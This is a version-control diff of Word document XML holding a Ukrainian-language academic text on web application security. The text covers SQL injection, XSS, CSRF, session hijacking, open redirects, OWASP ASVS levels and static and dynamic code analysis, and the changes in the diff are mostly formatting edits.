+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>-</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -25854,7 +25832,19 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Ін’єкція коду завжди була однією з найбільш значущих і поширених вразливостей Web-додатків, тому не дивно, що цей тип вразливостей займає верхню строчку списку OWASP. Існує безліч різновидів цієї уразливості, але до сих пір самою сумнозвісною з них є ін’єкція SQL-коду. Вона успішно використовується хакерами протягом більше десяти років. SQL ін'єкція полягає в тому, що зловмисник вводить SQL-команди в поле введення. Якщо код Web-додатка не відфільтровує дані, то на Web-сервері можна запустити SQL-команди і виконувати прямі запити до внутрішньої бази даних в обхід мережевих засобів захисту. Шляхом впровадження SQL-коду зловмисник може дістати таблиці з даними, змінити записи в таблицях і навіть повністю видалити базу даних.</w:t>
+        <w:t xml:space="preserve">Ін’єкція коду завжди була однією з найбільш значущих і поширених вразливостей Web-додатків, тому не дивно, що цей тип вразливостей займає верхню строчку списку OWASP. Існує безліч різновидів цієї уразливості, але до сих пір самою сумнозвісною з них є ін’єкція SQL-коду. Вона успішно використовується хакерами протягом більше десяти років. SQL ін'єкція полягає в тому, що зловмисник вводить SQL-команди в поле введення. Якщо код Web-додатка не відфільтровує дані, то на Web-сервері можна запустити </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>SQL-команди і виконувати прямі запити до внутрішньої бази даних в обхід мережевих засобів захисту. Шляхом впровадження SQL-коду зловмисник може дістати таблиці з даними, змінити записи в таблицях і навіть повністю видалити базу даних.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25960,7 +25950,6 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Зловмисник може спробувати вкрасти (несанкціоновано використовувати) Web-сеанс користувача, дізнавшись його секретний ідентифікатор. Знаючи секретний ідентифікатор сеансу, атакуючий може представитися Web-серверу аутентиф</w:t>
       </w:r>
       <w:r>
@@ -26106,7 +26095,19 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Міжсайтовий скриптинг (cross-site scripting, XSS) - це ще один різновид атаки на Web-додатки, що зберігає популярність вже багато років. Якщо Web-додаток містить XSS-уразливість, то зловмисник може впровадити на Web-сторінку шкідливий сценарій, що виконується при завантаженні сторінки користувачем.</w:t>
+        <w:t>Міжсайтовий скриптинг (cross-site scripting, XSS) - це ще один різновид атаки на Web-додатки, що зберігає популярність вже багато років. Якщо Web-додаток містить XSS-уразливість, то зловмисник може впровадити на Web-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>сторінку шкідливий сценарій, що виконується при завантаженні сторінки користувачем.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26243,7 +26244,6 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Вразливість</w:t>
       </w:r>
       <w:r>
@@ -26392,6 +26392,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Виведені додатком повідомлення про помилки, дозволяють зловмисникам краще зрозуміти структуру бази даних і підказують, в якому напрямку краще діяти, які команди і сценарії краще намагатися впроваджувати.</w:t>
       </w:r>
     </w:p>
@@ -26443,7 +26444,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -26479,7 +26480,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
         <w:tab/>
       </w:r>
@@ -26542,7 +26543,6 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Користувачі, що працюють з </w:t>
       </w:r>
       <w:r>
@@ -26819,7 +26819,19 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Для захисту від підробки міжсайтових запитів розробники можуть скористатися різними прийомами, включаючи обов'язкове використання в кожному запиті випадкового маркера для перевірки достовірності сеансу або використання випадкових імен п</w:t>
+        <w:t xml:space="preserve">Для захисту від підробки міжсайтових запитів розробники можуть скористатися різними прийомами, включаючи обов'язкове використання в кожному запиті випадкового маркера для перевірки достовірності сеансу або </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>використання випадкових імен п</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -27059,7 +27071,6 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Web-додатки часто перенаправляють користувачів на інші сторінки за допомогою певних параметрів. Якщо ці параметри не перевіряються, то зловмисник може обманним шляхом перенаправити користувача на шкідливу Web-сторінку, змусивши його розкрити свій пароль та інші важливі дані. Наприклад, зловмисник може створити повідомлення електронної пошти з фішинговою посиланням, що містить ім'я необхідного Web-сайту. При цьому відповідальний за перенаправлення параметр, що міститься в кінці URL-адреси, може бути не видно користувачеві, в результаті чого користувач з великою ймовірністю клацне за цим посиланням або скопіює її в Web-браузер, так як доменне ім'я в URL-адресі не викличе у нього ніяких підозр.</w:t>
       </w:r>
     </w:p>
@@ -27074,7 +27085,7 @@
           <w:color w:val="474747"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -27086,7 +27097,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -27101,6 +27112,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -27110,12 +27122,10 @@
           <w:color w:val="2A2A2A"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="uk-UA"/>
         </w:rPr>
         <w:br/>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -27126,6 +27136,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -27156,9 +27167,11 @@
           <w:color w:val="212121"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -27827,6 +27840,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>1.3</w:t>
             </w:r>
           </w:p>
@@ -32018,7 +32032,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{DA435F37-0A70-466C-9F87-7FD5CF1D54D1}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{DDB9DE63-2032-4B82-A158-98234D0F2C95}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Bullshit.docx
+++ b/Bullshit.docx
@@ -931,7 +931,32 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">процес реалізації - в результаті його виконання ескізне опис ПО перетворюється в повноцінний програмний продукт. При цьому створюється вихідний код, база даних і документація, які лежать </w:t>
+        <w:t>процес реалізації - в р</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>езультаті його виконання ескізн</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>ий</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> опис ПО перетворюється в повноцінний програмний продукт. При цьому створюється вихідний код, база даних і документація, які лежать </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -2505,14 +2530,16 @@
         <w:ind w:firstLine="708"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:strike/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:strike/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
@@ -2522,12 +2549,14 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:strike/>
           <w:sz w:val="28"/>
         </w:rPr>
         <w:t>ISO 9126[1]</w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:strike/>
           <w:sz w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
@@ -2536,6 +2565,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:strike/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -2544,6 +2574,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:strike/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
@@ -2553,30 +2584,16 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>сть програмного дод</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>атку</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> можна</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:strike/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>сть програмного додатку можна</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:strike/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
@@ -4592,7 +4609,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -4679,15 +4695,13 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:br/>
       </w:r>
@@ -5206,19 +5220,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>ASVS Рівень 3 є високий рівень контролю в межах рівня ASVS.This, як правило, зарезервовані для додатків, що вимагають значних рівнів перевірки безпеки, таких, як ті, які можуть бути знайдені в районах військових, охорони здор</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>ов'я і безпеки, життєво важливої ​​інфраструктури і т.д. організацій може знадобитися ASVS 3-го рівня для додатків, що виконують критично важливі функції, де збій може істотно вплинути на діяльність організації, і навіть її живучість. Приклад вказівки по застосуванню ASVS Level 3 представлена ​​нижче. Додаток досягає ASVS 3-го рівня (або Advanced), якщо він адекватно захищає від передових вразливостей безпеки додатків, а також демонструє принципи хорошого дизайну безпеки.</w:t>
+        <w:t>ASVS Рівень 3 є високий рівень контролю в межах рівня ASVS.This, як правило, зарезервовані для додатків, що вимагають значних рівнів перевірки безпеки, таких, як ті, які можуть бути знайдені в районах військових, охорони здоров'я і безпеки, життєво важливої ​​інфраструктури і т.д. організацій може знадобитися ASVS 3-го рівня для додатків, що виконують критично важливі функції, де збій може істотно вплинути на діяльність організації, і навіть її живучість. Приклад вказівки по застосуванню ASVS Level 3 представлена ​​нижче. Додаток досягає ASVS 3-го рівня (або Advanced), якщо він адекватно захищає від передових вразливостей безпеки додатків, а також демонструє принципи хорошого дизайну безпеки.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5259,7 +5261,28 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Застосування на ASVS 3-го рівня вимагає більш глибокого аналізу, архітектури, кодування і тестування, ніж всі інші рівні. Захищеної applicationis Modularized осмислено (для полегшення, наприклад, відмовостійкості, масштабованості і найбільше, рівні безпеки), і кожен модуль (розділених мережевим з'єднанням і / або фізичного примірника) піклується про своїх власних обов'язків безпеки (захист</w:t>
+        <w:t xml:space="preserve">Застосування на ASVS 3-го рівня вимагає більш глибокого аналізу, архітектури, кодування і тестування, ніж всі інші рівні. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:strike/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Захищеної applicationis Modularized о</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>смислено (для полегшення, наприклад, відмовостійкості, масштабованості і найбільше, рівні безпеки), і кожен модуль (розділених мережевим з'єднанням і / або фізичного примірника) піклується про своїх власних обов'язків безпеки (захист</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5300,7 +5323,58 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t> в глибину), які повинні бути належним чином documented.Responsibilities включають засоби керування для забезпечення конфіденційності (наприклад, шифрування), цілісність (наприклад, операції, перевірки вхідних даних), доступність</w:t>
+        <w:t xml:space="preserve"> в глибину), які повинні бути належним чином </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>задокументовані</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:strike/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Responsibilities</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> включають засоби керування для забезпечення конфіденційності (наприклад, шифрування), цілісність (наприклад, операції, перевірки вхідних даних), доступність</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5409,6 +5483,30 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Класифікація</w:t>
       </w:r>
       <w:r>
@@ -5993,7 +6091,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">ізні механізми аналізу, але найбільш поширеним і універсальним є статичний аналіз вихідного коду - </w:t>
+        <w:t xml:space="preserve">ізні механізми аналізу, але найбільш поширеним і універсальним є статичний аналіз вихідного коду - SAST (Static Application Security Testing), також існують методи динамічного аналізу - DAST (Dynamic Application Security Testing), що виконують перевірки коду при його виконанні, і різні гібридні варіанти, що поєднують різні типи аналізів. Динамічний аналіз є самостійним методом перевірки, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6004,7 +6102,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>SAST (Static Application Security Testing), також існують методи динамічного аналізу - DAST (Dynamic Application Security Testing), що виконують перевірки коду при його виконанні, і різні гібридні варіанти, що поєднують різні типи аналізів. Динамічний аналіз є самостійним методом перевірки, який може розширювати можливості статичного аналізу або застосовуватися самостійно в тих випадках, коли дос</w:t>
+        <w:t>який може розширювати можливості статичного аналізу або застосовуватися самостійно в тих випадках, коли дос</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6145,7 +6243,38 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">ідвантажуваних модулів, використовуваного стороннього програмного забезпечення і т. Д.). Як результатів роботи все аналізатори видають звіт про виявлені вразливості і помилки програмування, додатково деякі аналізатори надають функції по </w:t>
+        <w:t>ідвантажуваних модулів, використовуваного стороннього програмного забезпечення і т</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>. Д.). Як результатів роботи вс</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>і</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> аналізатори видають звіт про виявлені вразливості і помилки програмування, додатково деякі аналізатори надають функції по </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -6167,18 +6296,19 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> виправленню помилок. Варто зазначити, що автоматичне виправлення помилок не завжди працює коректно, тому даний функціонал призначений тільки для розробників веб-додатків і вбудованих модулів, замовник продукту повинен спиратися тільки на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">фінальний звіт аналізатора і використовувати отримані дані для прийняття </w:t>
+        <w:t xml:space="preserve"> виправленню помилок. Варто зазначити, що авто</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">матичне виправлення помилок не завжди працює коректно, тому даний функціонал призначений тільки для розробників веб-додатків і вбудованих модулів, замовник продукту повинен спиратися тільки на фінальний звіт аналізатора і використовувати отримані дані для прийняття </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -6221,6 +6351,7 @@
           <w:noProof/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5940425" cy="2083489"/>
@@ -6275,11 +6406,12 @@
       <w:pPr>
         <w:pStyle w:val="a3"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360" w:firstLine="348"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+        <w:ind w:left="0" w:firstLine="348"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
